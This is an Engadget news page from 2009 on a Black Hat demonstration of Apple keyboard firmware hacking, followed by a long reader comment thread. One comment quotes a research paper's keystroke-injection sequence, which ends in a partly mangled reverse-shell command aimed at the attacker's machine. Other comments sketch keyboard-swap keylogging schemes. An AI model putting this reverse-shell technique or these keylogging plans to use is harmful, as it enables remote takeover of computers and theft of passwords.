Apple keyboard gets hacked like a ripe papaya, perp caught on video
By Vlad Savov 
posted August 4th 2009 9:34PM
posted August 4th 2009 9:34PM
posted August 4th 2009 9:34PM
A look back on popular stories from today in a specific year.
Now that we've thrown 'em off the trail, use the form below to get in touch with the people at Engadget. Please fill in all of the required fields because they're required.
Wait. Is this concerning external keyboards, internal keyboards, or just the way that the Macs talk to keyboards?
External keyboards at least, but most likely internal ones too. It has nothing to do with the way Macs talk to them since the hacked keyboards function the same way on PCs.
I doubt the keyboard has a lot of space for storing keystrokes. It probably has the bare minimum amount of space to fit the firmware.
I could see it being potentially dangerous, though, if it was triggered by a specific username and only stored the dozen or so characters that came after it.
8kb is flash, it has only 256 bytes of working memory
Just read the white paper and here is an example of the exploits usefulness:
http://www.blackhat.com/presentations/bh-usa-09/CHEN/BHUSA09-Chen-RevAppleFirm-PAPER.pdf
*** An Excerpt From the White Paper ***
"As an example, the keyboard could send the following keystrokes: COMMAND-SPACE, followed by terminal and RETURN, then followed by exec /bin/sh 0&0 2>&0 and RETURN, where 127.0.0.1 is of course replaced by the IP address of the attacker’s machine. In Mac OS X, COMMAND-SPACE activates Spotlight and terminal is typed into the Spotlight search box to launch the terminal application. Then exec is used to send a shell back to the attacker [14]. The above command just sends a shell back to port 4444 on localhost. The firewall in the Mac OS X Leopard operating system is by default not enabled, and in any case, does not block outgoing connections. In the event that the user uses an outbound firewall like Little Snitch, an extra RETURN at the end of the above sequence of keystrokes will select the default option of allowing the outbound TCP connection from Terminal.app."
@Paul
You need to go back to great school to learn your numbers. 8K = 8 x 1024 = 8192 characters.
@the observer: that was a bit unnecessary. at any rate, i think what paul meant when he said characters was actual characters, like ABC123, not bits and what-not. oh yeah, learn what tact is at this "great school".
What the hell are you talking about. 8K is only 2 characters.
Whether or not it's a practical attack, or the keyboard can store enough data to be useful, the idea is genius-level creativity (to me, at least). Awesome.
Back in DOS days, TRS (terminate and state resident) self replicating virus was written in 407 bytes of code. Where there is a will, there is a way!
I always find hacks interesting. I just don't see how someone finds this stuff out. Seems like they have too much time on their hands.
I'm a registered fanboy, and I still don't care.
you realize this has nothing to do with the OS, rather it has something to do with the HARDWARE. Granted it is an Apple keyboard in this video, this could theoretically happen to almost any keyboard. Please refrain from starting a flame war.
There is no additional risk to this hack. In order to get the stored keys off your system, a hacker would have to have code running as administrator on your machine. And if he has code running as administrator on your machine, he doesn't need to hack your keyboard to capture your keystrokes.
I never said it was tough to get administrator. Simply that in order to use this device to steal information remotely, you need to get administrator. And if you can get administrator, you don't need this device at all. It's a non-issue for remote hacking.
It could be used locally, having the keyboard steal keystrokes and then you come back later to the machine and get it to replay their password into a text window.
you clearly don't get the difference between OS and keyboard firmware ...
you clearly don't get the difference between OS and keyboard firmware ...
CLICK IT AGAIN, JIMBO!!
not me, it's AT&T DSL in san francisco
@ethana2:
You fvcking crack me up.
Yeah that's why every year when they have that Hackathon the Mac falls in seconds.
If the data stored in the keyboard, it should be suffcient to swap the keyboard.
Unless I've misread, the following scenario is a possibility:
1. Swap keyboard against infected one.
2. Log login data
3. Swap keyboard against original one.
4. Read login data
5. ???
6. Profit!
couldn't you sell the keyboard to somebody with the firmware preloaded? Buy it from bestbuy, load firmware, return it, keep trying every day until you get a response.
@Brian
Right-
Step 1: Buy keyboard
Step 2: Hack keyboard
Step 3: Return keyboard
Step 4: Break into the house of the person who bought the keyboard and take it home with you so you can look at the logged keystrokes.
It's f*cking foolproof.
@Mmmm... Dohnuts
You could send the information it to a webserver via terminal.
hey donuts - stop eating and read the F'in article - just set it up to send out the info via this little thingy called the interwebZ
@Kristofer & phenoum
That WOULD be ideal, if that was how this hack worked. Watch the f'in' video guys. It's a local keylogger, not a computer controlling keyboard from hell that has any form of internet access. You each earn one phail.
@Mmmm... Dohnuts.
Search for "http://www.blackhat.com/presentations/bh-usa-09/CHEN/BHUSA09-Chen-RevAppleFirm-PAPER.pdf" on the first comment page. Read the whitepaper excerpt below it. The keyboard doesn't need to have internet access. All you need is for the keyboard to be connected to a computer that has internet access.
I think Jimbo has an infected keyboard.
Apple welcome to the real world.
I can't hear you! I am within Steve's reality distortion field! :P
"Since when was Apple in a "fake" world?"
starting the second when Apple Fans have been telling us that Apple's product are un-hackable. Every product has issues, more users = more hackers
@ Jimbo
Only ardent Winboy fans fabricate stories of Apple fans saying Macs are un-hackable in order to attack them. Just like you.
Good job dumbass.
@FoxKenji
I know quite a few number of people who bought Apple computers because they have heard from other Apple users that Macs are pretty much invulnerable to hacks and viruses. So his "story" is not fabricated, making you the dumbass.
@EB
Wow that's one hell of a solid argument..."I know people who heard from other people that Macs are unhackable." Most Mac users are like most Windows users: non-extremist. Not every Mac user is stupid enough to think that their computer is unhackable, and you know that.
Of course I know that, and I didn't say ALL Mac users claim that OSX was invulnerable did I? I am just saying that there are very naive people both on Windows and Mac OS side, who believe that there is such thing as a perfect piece of software, which is simply not true.
Alex, come on. This is number 1 reasons why people who are in tech business buy Mac. Yes you are different and know what, why, where ... remember the discussions few months ago about notes Apple posted on their site that you need antivirus and the storm of comments how Mac is safe?
You can see even posts here in this topic about "unbreakable access to Macs" ... Windows users are sick of these comments because we all know that OSX has more holes than Swiss cheese. When we point it out, you get all pissy and offensive.
all your keyboards are belong to us
lol i love hearing about apple security flaws.
naturally windows has its share, but the stupid things that people find on apple devices make me chuckle :)
At least Apple flaws get fixed in a timely fashion. I'd rather have a widely known issue arise from a simple to understand flaw and know its being fixed in future revisions than have a cluster-fsck of driver, firmware, and dll-hell caused by a hundred different, mostly incompetent, companies that results in noone having a clue where the flaws are.
+1 lordmorgul
@lordmorgul
acutally windows patch time is much faster then Mac (13 times faster) so your argument is as dumb as your fanboism
http://news.softpedia.com/news/Windows-vs-Apple-Mac-OS-X-vs-Red-Hat-Linux-82966.shtml
"Of the five operating systems assessed in the last six months of 2007, Microsoft Windows had the shortest average patch development time of six days based on a sample set of 22 patched vulnerabilities. None of the vulnerabilities affected third-party applications. This is shorter than the average patch development time of 18 days in the first six months of 2007, based on a sample set of 38 vulnerabilities, including two vulnerabilities that affected third-party applications," Symantec revealed."
"Apple, the maker of Mac OS X, not only had to plug more vulnerabilities in its operating system compared to Windows, but also spent approximately 13 times as much as Microsoft doing it. "Apple had the fourth shortest average patch development time during this reporting period. Its average was 79 days for 86 vulnerabilities, including 47 third-party vulnerabilities. This period is longer than the 43-day average recorded in the first six months of 2007, during which the average was calculated from a sample set of 59 vulnerabilities, nine of which affected third-party applications," Symantec revealed."
taped up iSight FTW
HAHAHAHAHAAHAHAHA LMAO
you know what it is is that at a hacker conference you can't be too careful
so forget disabling drivers and shit and just go with it the hard way
How is that the hard way? Looks pretty easy to me.
We didn't start the flame war.
Well, this hack is pretty useless against me since after typing my login passwords I type plenty more than 1KB worth of characters. So all you'd get is a backwards version of my engadget comments.
Then again my comments are pure gold!
Dateline NBC needs to lure in the pervs with underage gadgets dressed in cute little pants.
AnnoyingPoster, you are an idiot.